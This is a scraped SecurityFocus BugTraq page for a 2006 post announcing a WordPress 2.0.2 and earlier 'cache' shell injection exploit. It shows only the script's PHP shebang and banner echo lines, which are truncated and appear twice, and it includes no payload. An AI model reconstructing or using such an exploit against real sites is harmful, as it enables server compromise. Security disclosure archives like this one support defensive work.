BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
Wordpress <=2.0.2 'cache' shell injection
May 25 2006 07:01PM
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "--------------------------------------------------------------------\r\
n";
echo "| WordPress <= 2.0.2 'cache' shell injection exploit |\r\n";
echo "| by rgod rgod (at) autistici (dot) org [email concealed] |\r\n";
echo "| si...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
<?
echo "--------------------------------------------------------------------\r\
n";
echo "| WordPress <= 2.0.2 'cache' shell injection exploit |\r\n";
echo "| by rgod rgod (at) autistici (dot) org [email concealed] |\r\n";
echo "| si...
[ more ]